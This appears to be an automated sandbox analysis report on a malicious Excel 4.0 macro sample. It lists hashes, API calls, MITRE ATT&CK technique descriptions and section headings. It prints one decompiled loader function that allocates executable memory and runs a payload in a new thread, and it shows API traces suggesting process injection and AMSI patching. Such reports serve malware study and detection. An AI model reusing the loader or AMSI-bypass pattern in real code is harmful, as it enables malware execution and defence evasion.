Source File: 00000001.00000002.365515365.0000000004DC1000.00000020.00000001.sdmp, Offset: 04DC1000, based on PE: false

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID:
API String ID: 1866314245-0
Opcode ID: 24d48ef8d86ae3252dcbc9dcf5d3f8ecff2c63fafd136b4c23cacff057207f3b
Instruction ID: 99c0a8b97e4742d61d77d077ac6b9726e6e16422a9900d6cc1c5ec7b130d30bd
Opcode Fuzzy Hash: 24d48ef8d86ae3252dcbc9dcf5d3f8ecff2c63fafd136b4c23cacff057207f3b
Instruction Fuzzy Hash: 73F1E8B4A0021AEFDB04DF94D994AAEB7B1FF48304F208599E915AB342D735EE41DF90

Uniqueness

Uniqueness Score: -1.00%

Function 05161000, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101
windowtimesleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E05161000() {
				_Unknown_base(*)()* _v8;
				void* _v12;
				struct tagMSG _v40;
				long _v44;
				struct HWND__* _v48;
				long _v52;
				void* _v56;
				void* _t38;
				void* _t43;
				int _t45;

				SetTimer(0, 0, 0x25b, 0); // executed
				while(GetMessageW( &_v40, 0, 0, 0) != 0) {
					_v40.message = _v40.message + 1;
					if(_v40.message != 0x114) {
						DispatchMessageW( &_v40);
						continue;
					} else {
					}
					break;
				}
				_v12 = 0;
				_v48 = 0;
				_v52 = 0x5000;
				while(_v52 > 0x1000) {
					_v52 = _v52 - 1;
				}
				_v44 = _v52;
				while(_v44 > 0x40) {
					_v44 = _v44 - 1;
				}
				do {
					_t38 = VirtualAlloc(_v12, 0x43000, _v52, _v44); // executed
					_v8 = _t38;
					if(_v8 == 0) {
						Sleep(0x1f4);
					}
				} while (_v8 == 0);
				_v48 =  &(_v48->i);
				E05161140(_v48, _v8);
				_t43 = CreateThread(0, 0, _v8, 1, 0, 0); // executed
				_v56 = _t43;
				SetTimer(0, 0, 0x2000, 0); // executed
				while(1) {
					_t45 = GetMessageW( &_v40, 0, 0, 0);
					if(_t45 == 0) {
						break;
					}
					_v40.message = _v40.message + 1;
					if(_v40.message == 0x114) {
						return _t45;
					}
					DispatchMessageW( &_v40);
				}
				return _t45;
			}

0x05161011
0x05161017
0x05161031
0x0516103b
0x05161043
0x00000000
0x00000000
0x0516103d
0x00000000
0x0516103b
0x0516104b
0x05161052
0x05161059
0x05161060
0x0516106f
0x0516106f
0x05161077
0x0516107a
0x05161086
0x05161086
0x0516108b
0x0516109c
0x051610a2
0x051610a9
0x051610b0
0x051610b0
0x051610b6
0x051610c2
0x051610cd
0x051610e0
0x051610e6
0x051610f4
0x051610fa
0x05161104
0x0516110c
0x00000000
0x00000000
0x05161114
0x0516111e
0x00000000
0x00000000
0x05161126
0x05161126
0x05161131

APIs

SetTimer.USER32 ref: 05161011
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 05161021
DispatchMessageW.USER32 ref: 05161043
VirtualAlloc.KERNELBASE(00000000,00043000,00001000,00000040), ref: 0516109C
Sleep.KERNEL32(000001F4), ref: 051610B0
CreateThread.KERNELBASE(00000000,00000000,00000000,00000001,00000000,00000000), ref: 051610E0
SetTimer.USER32 ref: 051610F4
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 05161104
DispatchMessageW.USER32 ref: 05161126

Strings

@, xrefs: 0516107A

Memory Dump Source

Source File: 00000001.00000002.366047793.0000000005161000.00000020.00000001.sdmp, Offset: 05160000, based on PE: true

Associated: 00000001.00000002.366034721.0000000005160000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.366111380.0000000005194000.00000002.00000001.sdmp Download File

Similarity

API ID: Message$DispatchTimer$AllocCreateSleepThreadVirtual
String ID: @
API String ID: 368155642-2766056989
Opcode ID: f76e12491697fd3637708178d2c8bb49bb3486f0583eadb7fe722d6a04287225
Instruction ID: f86b3a33748ce5cdab4a3eb8bcc1d2c15516b49a091d10a95949a626bc1c5065
Opcode Fuzzy Hash: f76e12491697fd3637708178d2c8bb49bb3486f0583eadb7fe722d6a04287225
Instruction Fuzzy Hash: AA41FA70A94208FBEF14CFA4DD4ABEDBB75BB48705F148118F601BA2C0D7B5A950CB64

Uniqueness

Uniqueness Score: -1.00%

Function 051A079D, Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 412processlibraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?), ref: 051A08AD
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 051A09BB
CreateProcessInternalW.KERNELBASE(?,00000000,?,00000000,00000000,00000000,0800000C,00000000,?,?,?), ref: 051A0A7A
Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 051A0D2B
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,?,?), ref: 051A0D61

Strings

L!m>, xrefs: 051A0BA3
L!m>, xrefs: 051A0B34

Memory Dump Source

Source File: 00000001.00000002.366120196.00000000051A0000.00000040.00000001.sdmp, Offset: 051A0000, based on PE: false

Similarity

API ID: CreateProcessWow64$AddressDirectoryDisableInternalProcRedirectionSystem
String ID: L!m>$L!m>
API String ID: 2693396481-4066150234
Opcode ID: 469ad231b313f123bf2e1c76420fef79b09eb17dbd732a6168aa752398dc6a95
Instruction ID: 3cf8cd5daa1808f0d8319184f7679f8993d6b3d7e982f80f7d8f97333d3ab79a
Opcode Fuzzy Hash: 469ad231b313f123bf2e1c76420fef79b09eb17dbd732a6168aa752398dc6a95
Instruction Fuzzy Hash: 5BF14D7D20A340DFD62ADB58C498B2A77E2BB8D354F50485AF596CB3A4D771E880CB13

Uniqueness

Uniqueness Score: -1.00%

Function 04DC14A0, Relevance: 12.2, APIs: 8, Instructions: 171COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000007F), ref: 04DC14DB
SetLastError.KERNEL32(0000007F), ref: 04DC1507

Memory Dump Source

Source File: 00000001.00000002.365515365.0000000004DC1000.00000020.00000001.sdmp, Offset: 04DC1000, based on PE: false

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: e4936cfde7588d32721960a61095864a63fcabaf21df2bc65b290a430ee6bab1
Instruction ID: a6e7545138ed106a0b67e3473a1340a7e9814db6e54f3dc42a6593ce2f64697a
Opcode Fuzzy Hash: e4936cfde7588d32721960a61095864a63fcabaf21df2bc65b290a430ee6bab1
Instruction Fuzzy Hash: B171B074E5011AEFDB08DF94C594AADB7B2FF48304F248598E456AB342D734AE81DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 04DC21A0, Relevance: 6.2, APIs: 4, Instructions: 182COMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 04DC21F9
SetLastError.KERNEL32(0000007E), ref: 04DC223B

Memory Dump Source

Source File: 00000001.00000002.365515365.0000000004DC1000.00000020.00000001.sdmp, Offset: 04DC1000, based on PE: false

Similarity

API ID: ErrorHugeLastRead
String ID:
API String ID: 3239643929-0
Opcode ID: 60a967cef05d0aed8876d3a0a6a1fa8e7f2c4305ae722471cc970ac07f2ca847
Instruction ID: 21a05038227aabb9536564116211bcfa95f6f4b2501c8e32fe520e44c145f3f9
Opcode Fuzzy Hash: 60a967cef05d0aed8876d3a0a6a1fa8e7f2c4305ae722471cc970ac07f2ca847
Instruction Fuzzy Hash: 3281A975A0020ADFDB04DF94C894AAEBBB1FF48314F148198E949AB351D734EE81CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04D8002D, Relevance: 4.9, APIs: 3, Instructions: 387memoryCOMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,04D80005), ref: 04D800E9
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,04D80005), ref: 04D80111

Memory Dump Source

Source File: 00000001.00000002.365479708.0000000004D80000.00000040.00000001.sdmp, Offset: 04D80000, based on PE: false

Similarity

API ID: AllocInfoNativeSystemVirtual
String ID:
API String ID: 2032221330-0
Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
Instruction ID: 9a472508b2ff4a45da11c56dd258f8614fab08edcb5de3f8758296ba0e4a7be5
Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
Instruction Fuzzy Hash: E6D1AB71A047069FDB25EF69C88077AB3E0FF84318F1A852DE8958B241E774F859CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04DC1D10, Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.365515365.0000000004DC1000.00000020.00000001.sdmp, Offset: 04DC1000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d833fe0ad8c4e43bffccba1188ab49dd7effbcc4df6c02883086edddb3b4a00
Instruction ID: f0e4bc314bf140c328729123d787325486201f3880a6f52e4611f72c7b103b87
Opcode Fuzzy Hash: 8d833fe0ad8c4e43bffccba1188ab49dd7effbcc4df6c02883086edddb3b4a00
Instruction Fuzzy Hash: 9341A774A0021AEFDB04CF44C494BAEB7B6FB88314F14C599E8199B356D775EA82CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04DC19F0, Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,04DC1A51,00003000,00000004,000000BE,?,04DC1A51,?), ref: 04DC1A01

Memory Dump Source

Source File: 00000001.00000002.365515365.0000000004DC1000.00000020.00000001.sdmp, Offset: 04DC1000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e0722dfcd5dd589aa04c50605676582638d3f87268923f1f2586332791870679
Instruction ID: de94f744db09db05a850b4f432b11e10254a7ccf8879a3f340b11e4c59c3f8eb
Opcode Fuzzy Hash: e0722dfcd5dd589aa04c50605676582638d3f87268923f1f2586332791870679
Instruction Fuzzy Hash: FFD0C9B5645208BBE710DE84D816F69BBACD704611F004185FE089B380D5B1AE0056A1

Uniqueness

Uniqueness Score: -1.00%

Function 04DC1820, Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 04DC182F

Memory Dump Source

Source File: 00000001.00000002.365515365.0000000004DC1000.00000020.00000001.sdmp, Offset: 04DC1000, based on PE: false

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 554158937a67d82fd3f644ce5e169ed134e3189cf6d43d73f9d378b6783b6a7b
Instruction ID: 18e8915e1aa26f31e9d88d58da29f1efd35c5d1d816660a2da37faa0b65131f4
Opcode Fuzzy Hash: 554158937a67d82fd3f644ce5e169ed134e3189cf6d43d73f9d378b6783b6a7b
Instruction Fuzzy Hash: 75C04C7621430DAB8B04DF98E894DEB37ADFB8C611B04C508BA1D87200C635F9109BA4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04D8095E, Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.365479708.0000000004D80000.00000040.00000001.sdmp, Offset: 04D80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
Instruction ID: 424afa33651b71d5a161ee47f00b2de3631e36276e5e8ebdaac42532c3fc6819
Opcode Fuzzy Hash: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
Instruction Fuzzy Hash: 30F10AB4A01209EFDB04DF94C990AAEB7B5FF88304F218558E906AB345D771FE45DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04D80456, Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.365479708.0000000004D80000.00000040.00000001.sdmp, Offset: 04D80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
Instruction ID: 274c2e8700b45facd75e88debe11d4217faece9157bdba554d12e36e86d3bec0
Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
Instruction Fuzzy Hash: C9317C76A4474A8FC711EF1CC48093AB7E4FF89314F0649ADE99587312E334F94A8B91

Uniqueness

Uniqueness Score: -1.00%

Function 04DC25E0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(04DC4070,00000000,00000800), ref: 04DC25F9
GetProcAddress.KERNEL32(00000000,04DC4078), ref: 04DC2615
VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 04DC2650
VirtualProtect.KERNEL32(?,00000004,?,?), ref: 04DC2671

Strings

AMSI, xrefs: 04DC263C

Memory Dump Source

Source File: 00000001.00000002.365515365.0000000004DC1000.00000020.00000001.sdmp, Offset: 04DC1000, based on PE: false

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID: AMSI
API String ID: 3300690313-3828877684
Opcode ID: e7c51d5efa7061ef8ed5ffb0f77f70d05541a1720279f0e770b502095bce6384
Instruction ID: 0bb755cdfa46d2cf61c7840ec76bb59240ee51d335028a40fa501b0c4317f1dd
Opcode Fuzzy Hash: e7c51d5efa7061ef8ed5ffb0f77f70d05541a1720279f0e770b502095bce6384
Instruction Fuzzy Hash: 3211ECB5E4020AEFDB04CF94C855BAEBBB4FB48304F108599E641A7340D774AA44DF65

Uniqueness

Uniqueness Score: -1.00%

Function 04DC2430, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 04DC2468
VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 04DC24B2

Strings

@, xrefs: 04DC2453

Memory Dump Source

Source File: 00000001.00000002.365515365.0000000004DC1000.00000020.00000001.sdmp, Offset: 04DC1000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: c13e8985894ec7251359bfaa4538ac45b9ece98e8ce6590143bcade4e9ecd52f
Instruction ID: 73d535967b0be299fb742be0ae8e476222a5b7d03089becec4b9be7627ba5756
Opcode Fuzzy Hash: c13e8985894ec7251359bfaa4538ac45b9ece98e8ce6590143bcade4e9ecd52f
Instruction Fuzzy Hash: A921B9B0E0420AEFDF14CF98C984BADBBB5FF54304F208599D945A7244D774AE40DB55

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 1A8C92C-1A8C92C.xls

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "1A8C92C-1A8C92C.xls"

Indicators

Summary

Document Summary

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 255780

General

Macro 4.0 Code

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Function 05161000, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101
windowtimesleepCOMMON